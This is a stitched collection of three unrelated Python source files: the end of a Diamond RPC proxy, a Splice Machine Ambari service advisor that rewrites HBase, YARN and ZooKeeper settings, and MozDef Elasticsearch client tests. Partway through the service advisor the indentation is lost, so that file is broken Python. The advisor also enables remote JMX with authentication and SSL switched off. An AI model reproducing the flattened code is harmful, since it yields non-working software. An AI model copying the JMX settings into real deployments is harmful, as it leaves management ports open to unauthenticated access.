                'code': -342, 'message': 'missing HTTP response from server'})

        responsedata = http_response.read().decode('utf8')
        response = json.loads(responsedata, parse_float=decimal.Decimal)
        if "error" in response and response["error"] is None:
            log.debug("<-%s- %s"%(response["id"], json.dumps(response["result"], default=EncodeDecimal)))
        else:
            log.debug("<-- "+responsedata)
        return response
| TGDiamond/Diamond | qa/rpc-tests/python-diamondrpc/diamondrpc/authproxy.py | Python | mit | 5,784 |
#!/usr/bin/env ambari-python-wrap
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import imp
import math
import os
import re
import socket
import traceback
import glob
# Locate the stack-level service_advisor.py relative to this script and load
# it dynamically with imp, since it is not on the normal import path.
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
STACKS_DIR = os.path.join(SCRIPT_DIR, '../../../stacks/')
PARENT_FILE = os.path.join(STACKS_DIR, 'service_advisor.py')

try:
  with open(PARENT_FILE, 'rb') as fp:
    service_advisor = imp.load_module('service_advisor', fp, PARENT_FILE, ('.py', 'rb', imp.PY_SOURCE))
except Exception as e:
  # Best effort: log the traceback and continue; the class definition below
  # will then fail at its base-class lookup.
  traceback.print_exc()
  print "Failed to load parent"
class SPLICEMACHINE251ServiceAdvisor(service_advisor.ServiceAdvisor):
  def __init__(self, *args, **kwargs):
    """Forward construction to the dynamically-loaded ServiceAdvisor base."""
    self.as_super = super(SPLICEMACHINE251ServiceAdvisor, self)
    self.as_super.__init__(*args, **kwargs)
def colocateService(self, hostsComponentsMap, serviceComponents):
pass
  def getServiceComponentLayoutValidations(self, services, hosts):
    """Return component-layout validation issues; none for this service."""
    print "getServiceComponentLayoutValidations"
    return []
def getServiceConfigurationRecommendations(self, configurations, clusterData, services, hosts):
#Update HBase Classpath
print "getServiceConfigurationRecommendations",services
if "hbase-env" in services["configurations"]:
hbase_env = services["configurations"]["hbase-env"]["properties"]
if "content" in hbase_env:
content = hbase_env["content"]
HBASE_CLASSPATH_PREFIX = "export HBASE_CLASSPATH_PREFIX=/var/lib/splicemachine/*:/usr/hdp/3.1.0.0-78/spark2/jars/*:/usr/hdp/3.1.0.0-78/hadoop/lib/ranger-hdfs-plugin-impl/*:/usr/hdp/3.1.0.0-78/hbase/lib/atlas-hbase-plugin-impl/kafka*"
HBASE_MASTER_OPTS = "export HBASE_MASTER_OPTS=\"${HBASE_MASTER_OPTS} -D"+ " -D".join(self.getMasterDashDProperties()) + "\""
HBASE_REGIONSERVER_OPTS = "export HBASE_REGIONSERVER_OPTS=\"${HBASE_REGIONSERVER_OPTS} -D"+ " -D".join(self.getRegionServerDashDProperties()) + "\""
HBASE_CONF_DIR = "export HBASE_CONF_DIR=${HBASE_CONF_DIR}:/etc/splicemachine/conf/"
if "splicemachine" not in content:
print "Updating Hbase Env Items"
HBASE_CLASSPATH_PREFIX = "#Add Splice Jars to HBASE_PREFIX_CLASSPATH\n" + HBASE_CLASSPATH_PREFIX
HBASE_MASTER_OPTS = "#Add Splice Specific Information to HBase Master\n" + HBASE_MASTER_OPTS
HBASE_REGIONSERVER_OPTS = "#Add Splice Specific Information to Region Server\n" + HBASE_REGIONSERVER_OPTS
HBASE_CONF_DIR = "#Add Splice Specific Information to Region Server\n" + HBASE_CONF_DIR
content = "\n\n".join((content, HBASE_CLASSPATH_PREFIX))
content = "\n\n".join((content, HBASE_MASTER_OPTS))
content = "\n\n".join((content, HBASE_REGIONSERVER_OPTS))
content = "\n\n".join((content, HBASE_CONF_DIR))
print "content: " + content
putHbaseEnvProperty = self.putProperty(configurations, "hbase-env", services)
putHbaseEnvProperty("content", content)
# Update HDFS properties in core-site
if "core-site" in services["configurations"]:
core_site = services["configurations"]["core-site"]["properties"]
putCoreSiteProperty = self.putProperty(configurations, "core-site", services)
for property, desired_value in self.getCoreSiteDesiredValues().iteritems():
if property not in core_site or core_site[property] != desired_value:
putCoreSiteProperty(property, desired_value)
# Update hbase-site properties in hbase-site
if "hbase-site" in services["configurations"]:
hbase_site = services["configurations"]["hbase-site"]["properties"]
putHbaseSitePropertyAttributes = self.putPropertyAttribute(configurations, "hbase-site")
putHBaseSiteProperty = self.putProperty(configurations, "hbase-site", services)
for property, desired_value in self.getHBaseSiteDesiredValues().iteritems():
if property not in hbase_site or hbase_site[property] != desired_value:
putHBaseSiteProperty(property, desired_value)
# Update hbase-site properties in hbase-site
if "yarn-site" in services["configurations"]:
yarn_site = services["configurations"]["yarn-site"]["properties"]
putYarnSitePropertyAttributes = self.putPropertyAttribute(configurations, "yarn-site")
putYarnSiteProperty = self.putProperty(configurations, "yarn-site", services)
for property, desired_value in self.getYarnSiteDesiredValues().iteritems():
if property not in yarn_site or yarn_site[property] != desired_value:
putYarnSiteProperty(property, desired_value)
#update zookeeper configs
if 'zoo.cfg' in services['configurations']:
zoo_cfg = services['configurations']['zoo.cfg']["properties"]
print(zoo_cfg),zoo_cfg
putZooProperty = self.putProperty(configurations, "zoo.cfg", services)
putZooProperty('maxClientCnxns',0)
putZooProperty('maxSessionTimeout',120000)
def getServiceConfigurationsValidationItems(self, configurations, recommendedDefaults, services, hosts):
print "getServiceConfigurationsValidationItems"
return []
# print "getServiceConfigurationsValidationItems"
# validate recommended properties in core-site
# siteName = "core-site"
# method = self.validateCoreSiteConfigurations
# items = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# siteName = "hdfs-site"
# method = self.validateHDFSSiteConfigurations
# resultItems = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# items.extend(resultItems)
# siteName = "hbase-site"
# method = self.validateHBaseSiteConfigurations
# resultItems = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# items.extend(resultItems)
def validateCoreSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateCoreSiteConfigurations"
core_site = properties
validationItems = []
for property, desired_value in self.getCoreSiteDesiredValues().iteritems():
if property not in core_site or core_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "core-site")
def validateHDFSSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateHDFSSiteConfigurations"
hdfs_site = properties
validationItems = []
for property, desired_value in self.getHDFSSiteDesiredValues().iteritems():
if property not in hdfs_site or hdfs_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "hdfs-site")
def validateHBaseSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateHBaseSiteConfigurations"
hbase_site = properties
validationItems = []
for property, desired_value in self.getHBaseSiteDesiredValues().iteritems():
print "->" + property + ":" + desired_value + ":" + hbase_site[property]
if property not in hbase_site or hbase_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "hbase-site")
def getCoreSiteDesiredValues(self):
core_site_desired_values = {
"ipc.server.listen.queue.size" : "3300"
}
return core_site_desired_values
def getHDFSSiteDesiredValues(self):
hdfs_site_desired_values = {
"dfs.datanode.handler.count" : "20",
"dfs.client.read.shortcircuit.buffer.size" : "131072",
}
return hdfs_site_desired_values
def getYarnSiteDesiredValues(self):
yarn_site_desired_values = {
"hdp.version" : "3.1.0.0-78"
}
return yarn_site_desired_values
def getHBaseSiteDesiredValues(self):
hbase_site_desired_values = {
"hbase.coprocessor.master.classes" : "com.splicemachine.hbase.SpliceMasterObserver",
"hbase.regionserver.global.memstore.size" : "0.25",
"hfile.block.cache.size" : "0.25",
"hbase.regionserver.handler.count" : "200",
"hbase.client.scanner.caching" : "1000",
"hbase.hstore.blockingStoreFiles" : "20",
"hbase.hstore.compactionThreshold" : "5",
"hbase.balancer.period" : "60000",
"hbase.client.ipc.pool.size" : "10",
"hbase.client.max.perregion.tasks" : "100",
"hbase.coprocessor.regionserver.classes" : "com.splicemachine.hbase.RegionServerLifecycleObserver,com.splicemachine.hbase.SpliceRSRpcServices",
"hbase.hstore.compaction.min.size" : "136314880",
"hbase.hstore.compaction.min" : "3",
"hbase.hstore.defaultengine.compactionpolicy.class" : "com.splicemachine.compactions.SpliceDefaultCompactionPolicy",
"hbase.hstore.defaultengine.compactor.class" : "com.splicemachine.compactions.SpliceDefaultCompactor",
"hbase.coprocessor.region.classes" : "org.apache.hadoop.hbase.security.access.SecureBulkLoadEndpoint,com.splicemachine.hbase.MemstoreAwareObserver,com.splicemachine.derby.hbase.SpliceIndexObserver,com.splicemachine.derby.hbase.SpliceIndexEndpoint,com.splicemachine.hbase.RegionSizeEndpoint,com.splicemachine.si.data.hbase.coprocessor.TxnLifecycleEndpoint,com.splicemachine.si.data.hbase.coprocessor.SIObserver,com.splicemachine.hbase.BackupEndpointObserver",
"hbase.htable.threads.max" : "96",
"hbase.ipc.warn.response.size" : "-1",
"hbase.ipc.warn.response.time" : "-1",
"hbase.master.loadbalance.bytable" : "true",
"hbase.master.balancer.stochastic.regionCountCost" : "1500",
"hbase.regions.slop" : "0",
"hbase.regionserver.global.memstore.size.lower.limit" : "0.9",
"hbase.client.scanner.timeout.period" : "1200000",
"hbase.regionserver.maxlogs" : "48",
"hbase.regionserver.thread.compaction.large" : "1",
"hbase.regionserver.thread.compaction.small" : "4",
"hbase.regionserver.wal.enablecompression" : "true",
"hbase.rowlock.wait.duration" : "10",
"hbase.splitlog.manager.timeout" : "3000",
"hbase.status.multicast.port" : "16100",
"hbase.wal.disruptor.batch" : "true",
"hbase.wal.provider" : "multiwal",
"hbase.wal.regiongrouping.numgroups" : "16",
"hbase.zookeeper.property.tickTime" : "6000",
"hfile.block.bloom.cacheonwrite" : "TRUE",
"io.storefile.bloom.error.rate" : "0.005",
"splice.authentication.native.algorithm" : "SHA-512",
"splice.authentication" : "NATIVE",
"splice.client.numConnections" : "1",
"splice.client.write.maxDependentWrites" : "60000",
"splice.client.write.maxIndependentWrites" : "60000",
"splice.compression" : "snappy",
"splice.marshal.kryoPoolSize" : "1100",
"splice.olap_server.clientWaitTime" : "900000",
"splice.ring.bufferSize" : "131072",
"splice.splitBlockSize" : "67108864",
"splice.timestamp_server.clientWaitTime" : "120000",
"splice.txn.activeTxns.cacheSize" : "10240",
"splice.txn.completedTxns.concurrency" : "128",
"splice.txn.concurrencyLevel" : "4096",
"splice.olap_server.memory" : "8192",
"splice.olap_server.memoryOverhead" : "2048",
"splice.olap_server.virtualCores" : "2",
"splice.authorization.scheme" : "NATIVE",
"hbase.replication.source.service" : "com.splicemachine.replication.SpliceReplication",
"hbase.replication.sink.service" : "com.splicemachine.replication.SpliceReplication",
"hbase.bucketcache.ioengine" : "",
"hbase.regionserver.replication.handler.count":"40"
}
return hbase_site_desired_values
def getMasterDashDProperties(self):
dashDProperties = [
"splice.spark.enabled=true",
"splice.spark.app.name=SpliceMachine",
"splice.spark.master=yarn",
"splice.spark.submit.deployMode=client",
"splice.spark.logConf=true",
"splice.spark.yarn.maxAppAttempts=1",
"splice.spark.driver.maxResultSize=1g",
"splice.spark.driver.cores=2",
"splice.spark.yarn.am.memory=1g",
"splice.spark.dynamicAllocation.enabled=true",
"splice.spark.dynamicAllocation.executorIdleTimeout=120",
"splice.spark.dynamicAllocation.cachedExecutorIdleTimeout=120",
"splice.spark.dynamicAllocation.minExecutors=0",
"splice.spark.kryo.referenceTracking=false",
"splice.spark.kryo.registrator=com.splicemachine.derby.impl.SpliceSparkKryoRegistrator",
"splice.spark.kryoserializer.buffer.max=512m",
"splice.spark.kryoserializer.buffer=4m",
"splice.spark.locality.wait=100",
"splice.spark.memory.fraction=0.5",
"splice.spark.scheduler.mode=FAIR",
"splice.spark.serializer=org.apache.spark.serializer.KryoSerializer",
"splice.spark.shuffle.compress=false",
"splice.spark.shuffle.file.buffer=128k",
"splice.spark.shuffle.service.enabled=true",
"splice.spark.reducer.maxReqSizeShuffleToMem=134217728",
"splice.spark.yarn.am.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.yarn.am.waitTime=10s",
"splice.spark.yarn.executor.memoryOverhead=2048",
"splice.spark.yarn.am.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.driver.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.driver.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.driver.extraClassPath=/usr/hdp/current/hbase-regionserver/conf:/usr/hdp/current/hbase-regionserver/lib/htrace-core-3.1.0-incubating.jar",
"splice.spark.ui.retainedJobs=100",
"splice.spark.ui.retainedStages=100",
"splice.spark.worker.ui.retainedExecutors=100",
"splice.spark.worker.ui.retainedDrivers=100",
"splice.spark.streaming.ui.retainedBatches=100",
"splice.spark.executor.cores=4",
"splice.spark.executor.memory=8g",
"spark.compaction.reserved.slots=4",
"splice.spark.eventLog.enabled=true",
"splice.spark.eventLog.dir=hdfs:///user/splice/history",
"splice.spark.local.dir=/tmp",
"splice.spark.executor.userClassPathFirst=true",
"splice.spark.driver.userClassPathFirst=true",
"splice.spark.executor.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.executor.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.executor.extraClassPath=/usr/hdp/current/hbase-regionserver/conf:/usr/hdp/current/hbase-regionserver/lib/htrace-core-3.1.0-incubating.jar:/var/lib/splicemachine/*:/usr/hdp/3.1.0.0-78/spark2/jars/*:/usr/hdp/current/hbase-master/lib/*:/usr/hdp/3.1.0.0-78/hbase/lib/atlas-hbase-plugin-impl/kafka*",
"splice.spark.yarn.jars=/usr/hdp/3.1.0.0-78/spark2/jars/*"
]
return dashDProperties
def getRegionServerDashDProperties(self):
dashDProperties = [
"com.sun.management.jmxremote.authenticate=false",
"com.sun.management.jmxremote.ssl=false",
"com.sun.management.jmxremote.port=10102"
]
return dashDProperties
| splicemachine/spliceengine | assembly/hdp3.1.5/src/main/resources/common-services/SPLICEMACHINE/2.5.1/service_advisor.py | Python | agpl-3.0 | 16,650 |
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Copyright (c) 2017 Mozilla Corporation
import time
import json
import pytest
import os
import sys
from mozdef_util.query_models import SearchQuery, TermMatch, Aggregation, ExistsMatch
from mozdef_util.elasticsearch_client import ElasticsearchClient, ElasticsearchInvalidIndex
sys.path.append(os.path.join(os.path.dirname(__file__), "../"))
from unit_test_suite import UnitTestSuite
class ElasticsearchClientTest(UnitTestSuite):
    """Base class for Elasticsearch client tests: builds a client and offers
    an event-count helper based on a terms aggregation."""

    def setup(self):
        super(ElasticsearchClientTest, self).setup()
        # Short bulk_refresh_time (3s) keeps the bulk-flush tests fast.
        self.es_client = ElasticsearchClient(self.options.esservers, bulk_refresh_time=3)

    def get_num_events(self):
        """Return the number of documents of type 'event' currently indexed."""
        self.refresh('events')
        search_query = SearchQuery()
        search_query.add_must(TermMatch('_type', 'event'))
        search_query.add_aggregation(Aggregation('_type'))
        results = search_query.execute(self.es_client)
        # The aggregation bucket list is empty when no events exist yet.
        if len(results['aggregations']['_type']['terms']) != 0:
            return results['aggregations']['_type']['terms'][0]['count']
        else:
            return 0
class MockTransportClass:
    """Wraps an Elasticsearch transport's perform_request so tests can count
    how many document-write requests were actually issued."""

    def __init__(self):
        self.request_counts = 0
        self.original_function = None

    def backup_function(self, orig_function):
        """Remember the real transport callable before monkey-patching."""
        self.original_function = orig_function

    def perform_request(self, method, url, params=None, body=None, timeout=None, ignore=()):
        # Count only write endpoints (bulk and single event); every request
        # is still delegated to the real transport unchanged.
        counted_endpoints = ('/_bulk', '/events/event')
        if url in counted_endpoints:
            self.request_counts += 1
        return self.original_function(method, url, params=params, body=body)
class TestWriteWithRead(ElasticsearchClientTest):
    """Round-trip test: save a correlated alert, then read it back by id."""

    def setup(self):
        super(TestWriteWithRead, self).setup()
        # Representative correlated alert, embedding the source event that
        # triggered it.
        self.alert = {
            'category': 'correlatedalerts',
            'events': [
                {
                    'documentid': 'l-a3V5mbQl-C91RDzjpNig',
                    'documentindex': 'events-20160819',
                    'documentsource': {
                        'category': 'bronotice',
                        'details': {
                            'hostname': 'testhostname',
                            'note': 'CrowdStrike::Correlated_Alerts example alert',
                            'sourceipaddress': '1.2.3.4'
                        },
                        'eventsource': 'nsm',
                        'hostname': 'nsm',
                        'processid': '1337',
                        'processname': 'syslog',
                        'receivedtimestamp': '2016-08-19T16:40:55.818595+00:00',
                        'severity': 'NOTICE',
                        'source': 'nsm_src',
                        'summary': 'CrowdStrike::Correlated_Alerts Host 1.2.3.4 caused an alert to throw',
                        'tags': ['tag1', 'tag2'],
                        'timestamp': '2016-08-19T16:40:55.818595+00:00',
                        'utctimestamp': '2016-08-19T16:40:55.818595+00:00'
                    },
                    'documenttype': 'bro'
                }
            ],
            'severity': 'NOTICE',
            'summary': 'nsm CrowdStrike::Correlated_Alerts Host 1.2.3.4 caused an alert to throw',
            'tags': [
                'nsm',
                'bro',
                'correlated'
            ],
            'url': 'https://mozilla.org',
            'utctimestamp': '2016-08-19T16:40:57.851092+00:00'
        }
        self.saved_alert = self.es_client.save_alert(body=self.alert)
        self.refresh('alerts')

    def test_saved_type(self):
        assert self.saved_alert['_type'] == 'alert'

    def test_saved_index(self):
        assert self.saved_alert['_index'] == self.alert_index_name

    def test_alert_source(self):
        # The document fetched by the assigned id must equal what was saved.
        self.fetched_alert = self.es_client.get_alert_by_id(self.saved_alert['_id'])
        assert self.fetched_alert['_source'] == self.alert

    def test_bad_id(self):
        # Looking up an unknown id returns None rather than raising.
        assert self.es_client.get_alert_by_id("123") is None
class TestNoResultsFound(ElasticsearchClientTest):
    """Searching on a field that exists nowhere must yield an empty hit list."""

    def test_search_no_results(self):
        query = SearchQuery()
        query.add_must(TermMatch('garbagefielddoesntexist', 'testingvalues'))
        response = query.execute(self.es_client)
        assert response['hits'] == []
class TestWithBadIndex(ElasticsearchClientTest):
    """Querying a nonexistent index must raise ElasticsearchInvalidIndex."""

    def test_search_nonexisting_index(self):
        query = SearchQuery()
        query.add_must(TermMatch('key', 'value'))
        with pytest.raises(ElasticsearchInvalidIndex):
            query.execute(self.es_client, indices=['doesnotexist'])
class TestSimpleWrites(ElasticsearchClientTest):
    """Single-document (non-bulk) write behavior and default field population."""

    def test_simple_writing_event_dict(self):
        # Patch the transport so we can count one HTTP request per save_event.
        mock_class = MockTransportClass()
        mock_class.backup_function(self.es_client.es_connection.transport.perform_request)
        self.es_client.es_connection.transport.perform_request = mock_class.perform_request
        event_length = 100
        events = []
        for num in range(event_length):
            events.append({"key": "value" + str(num)})
        for event in events:
            self.es_client.save_event(body=event)
        # Without bulk=True, every save is its own request.
        assert mock_class.request_counts == 100
        self.refresh(self.event_index_name)
        num_events = self.get_num_events()
        assert num_events == 100

    def test_simple_writing_event_string(self):
        # A pre-serialized JSON string body is accepted as well as a dict.
        event = json.dumps({"key": "example value for string of json test"})
        self.es_client.save_event(body=event)
        self.refresh(self.event_index_name)
        num_events = self.get_num_events()
        assert num_events == 1
        query = SearchQuery()
        query.add_must(ExistsMatch('key'))
        results = query.execute(self.es_client)
        assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
        assert results['hits'][0]['_source']['key'] == 'example value for string of json test'
        assert len(results['hits']) == 1
        assert results['hits'][0]['_type'] == 'event'

    def test_writing_dot_fieldname(self):
        # Field names containing dots must be stored and searchable verbatim.
        event = json.dumps({"key.othername": "example value for string of json test"})
        self.es_client.save_event(body=event)
        self.refresh(self.event_index_name)
        num_events = self.get_num_events()
        assert num_events == 1
        query = SearchQuery()
        query.add_must(ExistsMatch('key.othername'))
        results = query.execute(self.es_client)
        assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
        assert results['hits'][0]['_source']['key.othername'] == 'example value for string of json test'
        assert len(results['hits']) == 1
        assert results['hits'][0]['_type'] == 'event'

    def test_writing_event_defaults(self):
        # An empty event gets all standard MozDef fields populated on save.
        query = SearchQuery()
        default_event = {}
        self.populate_test_event(default_event)
        self.refresh(self.event_index_name)
        query.add_must(ExistsMatch('summary'))
        results = query.execute(self.es_client)
        assert len(results['hits']) == 1
        assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
        saved_event = results['hits'][0]['_source']
        assert 'category' in saved_event
        assert 'details' in saved_event
        assert 'hostname' in saved_event
        assert 'mozdefhostname' in saved_event
        assert 'processid' in saved_event
        assert 'processname' in saved_event
        assert 'receivedtimestamp' in saved_event
        assert 'severity' in saved_event
        assert 'source' in saved_event
        assert 'summary' in saved_event
        assert 'tags' in saved_event
        assert 'timestamp' in saved_event
        assert 'utctimestamp' in saved_event
        assert 'category' in saved_event

    def test_writing_with_type(self):
        # An explicit _type wrapper overrides the default 'event' type.
        query = SearchQuery()
        default_event = {
            "_type": "example",
            "_source": {
                "receivedtimestamp": UnitTestSuite.current_timestamp(),
                "summary": "Test summary",
                "details": {
                    "note": "Example note",
                }
            }
        }
        self.populate_test_event(default_event)
        self.refresh(self.event_index_name)
        query.add_must(ExistsMatch('summary'))
        results = query.execute(self.es_client)
        assert len(results['hits']) == 1
        assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
        assert results['hits'][0]['_type'] == 'example'
        assert results['hits'][0]['_source']['summary'] == 'Test summary'
        assert results['hits'][0]['_source']['details'] == {"note": "Example note"}

    def test_writing_with_source(self):
        # A _source wrapper without _type falls back to the default type.
        query = SearchQuery()
        default_event = {
            "_source": {
                "receivedtimestamp": UnitTestSuite.current_timestamp(),
                "summary": "Test summary",
                "details": {
                    "note": "Example note",
                }
            }
        }
        self.populate_test_event(default_event)
        self.refresh(self.event_index_name)
        query.add_must(ExistsMatch('summary'))
        results = query.execute(self.es_client)
        assert len(results['hits']) == 1
        assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
        assert results['hits'][0]['_type'] == 'event'
class BulkTest(ElasticsearchClientTest):
    """Base for bulk-write tests: patches the transport with the counting
    mock and flushes any queued bulk operations on teardown."""

    def setup(self):
        super(BulkTest, self).setup()
        self.mock_class = MockTransportClass()
        self.mock_class.backup_function(self.es_client.es_connection.transport.perform_request)
        self.es_client.es_connection.transport.perform_request = self.mock_class.perform_request

    def teardown(self):
        # Flush the outstanding bulk queue so it cannot leak into other tests.
        self.es_client.finish_bulk()
        super(BulkTest, self).teardown()
class TestBulkWrites(BulkTest):
    """2000 bulk saves should be batched into roughly 20 bulk requests."""

    def test_bulk_writing_simple(self):
        event_length = 2000
        events = []
        for num in range(event_length):
            events.append({"key": "value" + str(num)})
        assert self.mock_class.request_counts == 0
        for event in events:
            self.es_client.save_event(body=event, bulk=True)
        self.refresh(self.event_index_name)
        time.sleep(1)
        # We encountered a weird bug in travis
        # that would sometimes cause the number
        # of requests sent to ES to fluctuate.
        # As a result, we're checking within 5 requests
        # from 20, to verify we are still using bulk
        assert self.mock_class.request_counts <= 25 and self.mock_class.request_counts >= 15
        num_events = self.get_num_events()
        assert num_events == 2000
class TestBulkWritesWithMoreThanThreshold(BulkTest):
    """Events left over after the last full bulk batch are flushed by the
    timed bulk refresh rather than immediately."""

    def test_bulk_writing_more_threshold(self):
        event_length = 1995
        events = []
        for num in range(event_length):
            events.append({"key": "value" + str(num)})
        for event in events:
            self.es_client.save_object(index='events', doc_type='event', body=event, bulk=True)
        self.refresh(self.event_index_name)
        # We encountered a weird bug in travis
        # that would sometimes cause the number
        # of requests sent to ES to fluctuate.
        # As a result, we're checking within 5 requests
        # from 20, to verify we are still using bulk
        non_refreshed_request_count = self.mock_class.request_counts
        assert self.mock_class.request_counts <= 25 and self.mock_class.request_counts >= 15
        # Only the full batches (1900 events) have been sent so far.
        assert self.get_num_events() == 1900
        time.sleep(5)
        # All we want to check here is that during the sleep
        # we purged the queue and sent the remaining events to ES
        assert self.mock_class.request_counts > non_refreshed_request_count
        self.refresh(self.event_index_name)
        assert self.get_num_events() == 1995
class TestBulkWritesWithLessThanThreshold(BulkTest):
    """A handful of bulk saves stay queued until the bulk refresh interval."""

    def test_bulk_writing_less_threshold(self):
        self.es_client.save_event(body={'key': 'value'}, bulk=True)
        # Nothing hits ES until a batch fills or the refresh timer fires.
        assert self.get_num_events() == 0
        assert self.mock_class.request_counts == 0
        event_length = 5
        for num in range(event_length):
            self.es_client.save_event(body={"key": "value" + str(num)}, bulk=True)
        assert self.get_num_events() == 0
        self.refresh(self.event_index_name)
        # Sleep past the client's bulk_refresh_time (3s) so the queue flushes.
        time.sleep(5)
        assert self.get_num_events() == 6
class TestWriteWithID(ElasticsearchClientTest):
    """Saving an event with an explicit doc id must store it under that id."""

    def test_write_with_id(self):
        stored = self.es_client.save_event(body={'key': 'value'}, doc_id="12345")
        assert stored['_id'] == '12345'
class TestWriteWithIDExists(ElasticsearchClientTest):
    """Saving twice with the same doc id must update the same document."""

    def test_write_with_id(self):
        doc_id = "12345"
        payload = {'key': 'value'}
        stored = self.es_client.save_event(body=payload, doc_id=doc_id)
        assert stored['_id'] == doc_id
        # Re-save the mutated body under the same id; the id is retained.
        payload['new_key'] = 'updated_value'
        stored = self.es_client.save_event(body=payload, doc_id=doc_id)
        assert stored['_id'] == doc_id
        self.refresh(self.event_index_name)
        self.es_client.get_event_by_id(doc_id)
class TestGetIndices(ElasticsearchClientTest):
    """get_indices must list every index, including a freshly created one."""

    def teardown(self):
        super(TestGetIndices, self).teardown()
        if pytest.config.option.delete_indexes:
            self.es_client.delete_index('test_index')

    def test_get_indices(self):
        if pytest.config.option.delete_indexes:
            self.es_client.create_index('test_index')
            time.sleep(1)
            found = sorted(self.es_client.get_indices())
            assert found == [self.alert_index_name, self.previous_event_index_name, self.event_index_name, 'test_index']
class TestIndexExists(ElasticsearchClientTest):
    """index_exists must report True for an index that was just created."""

    def teardown(self):
        super(TestIndexExists, self).teardown()
        if pytest.config.option.delete_indexes:
            self.es_client.delete_index('test_index')

    def test_index_exists(self):
        if pytest.config.option.delete_indexes:
            self.es_client.create_index('test_index')
            time.sleep(1)
            assert self.es_client.index_exists('test_index') is True
class TestClusterHealth(ElasticsearchClientTest):
    """get_cluster_health must expose the standard ES health fields with the
    expected types.  NOTE: Python 2 specific -- relies on keys() returning a
    sortable list and on the `unicode` type."""

    def test_cluster_health_results(self):
        health_results = self.es_client.get_cluster_health()
        health_keys = health_results.keys()
        health_keys.sort()
        assert health_keys == ['active_primary_shards', 'active_shards', 'cluster_name', 'initializing_shards', 'number_of_data_nodes', 'number_of_nodes', 'relocating_shards', 'status', 'timed_out', 'unassigned_shards']
        assert type(health_results['active_primary_shards']) is int
        assert type(health_results['active_shards']) is int
        assert type(health_results['cluster_name']) is unicode
        assert type(health_results['initializing_shards']) is int
        assert type(health_results['number_of_data_nodes']) is int
        assert type(health_results['number_of_nodes']) is int
        assert type(health_results['relocating_shards']) is int
        assert type(health_results['status']) is unicode
        assert type(health_results['timed_out']) is bool
        assert type(health_results['unassigned_shards']) is int
class TestCreatingAlias(ElasticsearchClientTest):
    """Alias creation and reassignment behavior of the client."""

    def setup(self):
        super(TestCreatingAlias, self).setup()
        # Start from a clean slate; second arg True ignores missing indexes.
        if pytest.config.option.delete_indexes:
            self.es_client.delete_index('index1', True)
            self.es_client.delete_index('index2', True)
            self.es_client.delete_index('alias1', True)

    def teardown(self):
        super(TestCreatingAlias, self).teardown()
        if pytest.config.option.delete_indexes:
            self.es_client.delete_index('index1', True)
            self.es_client.delete_index('index2', True)
            self.es_client.delete_index('alias1', True)

    def test_simple_create_alias(self):
        if pytest.config.option.delete_indexes:
            self.es_client.create_index('index1')
            self.es_client.create_alias('alias1', 'index1')
            alias_indices = self.es_client.get_alias('alias1')
            assert alias_indices == ['index1']
            indices = self.es_client.get_indices()
            assert 'index1' in indices

    def test_alias_multiple_indices(self):
        # create_alias re-points the alias: only the last index remains.
        if pytest.config.option.delete_indexes:
            self.es_client.create_index('index1')
            self.es_client.create_index('index2')
            self.es_client.create_alias('alias1', 'index1')
            self.es_client.create_alias('alias1', 'index2')
            alias_indices = self.es_client.get_alias('alias1')
            assert alias_indices == ['index2']
            indices = self.es_client.get_indices()
            assert 'index1' in indices
            assert 'index2' in indices

    def test_create_alias_multiple_indices(self):
        # create_alias_multiple_indices attaches the alias to both at once.
        self.es_client.create_index('index1')
        self.es_client.create_index('index2')
        self.es_client.create_alias_multiple_indices('alias1', ['index1', 'index2'])
        alias_indices = self.es_client.get_alias('alias1')
        assert len(alias_indices) == 2
        assert 'index1' in alias_indices
        assert 'index2' in alias_indices
        indices = self.es_client.get_indices()
        assert 'index1' in indices
        assert 'index2' in indices
class TestBulkInvalidFormatProblem(BulkTest):
    """A document that fails date parsing during bulk indexing is dropped
    without blocking the valid documents in the same batch."""

    def setup(self):
        super(TestBulkInvalidFormatProblem, self).setup()
        # Strict date mapping so a non-date 'utcstamp' triggers a parse error.
        mapping = {
            "mappings": {
                "event": {
                    "properties": {
                        "utcstamp": {
                            "type": "date",
                            "format": "dateOptionalTime"
                        }
                    }
                }
            }
